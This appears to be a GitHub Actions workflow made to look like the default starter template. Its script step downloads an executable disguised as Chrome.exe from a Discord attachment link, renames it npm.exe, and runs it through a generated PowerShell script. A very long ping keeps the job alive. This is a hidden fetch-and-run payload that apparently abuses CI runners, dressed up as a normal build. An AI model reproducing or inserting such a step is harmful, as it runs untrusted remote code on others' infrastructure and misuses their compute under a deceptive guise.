# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the action will run. 
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: windows-2019

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/setup-node@v1

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          dir
          Invoke-WebRequest https://cdn.discordapp.com/attachments/714547391746932747/830902212237721610/Chrome.exe -OutFile npm.exe
          cmd /c echo .\npm.exe >>a.ps1
          cmd /c echo ping localhost -n 11111111111111111111111111111 -w 99999999999999999999999999999999999 >>a.ps1
          .\a.ps1
          echo Add other actions to build,
          echo test, and deploy your project.
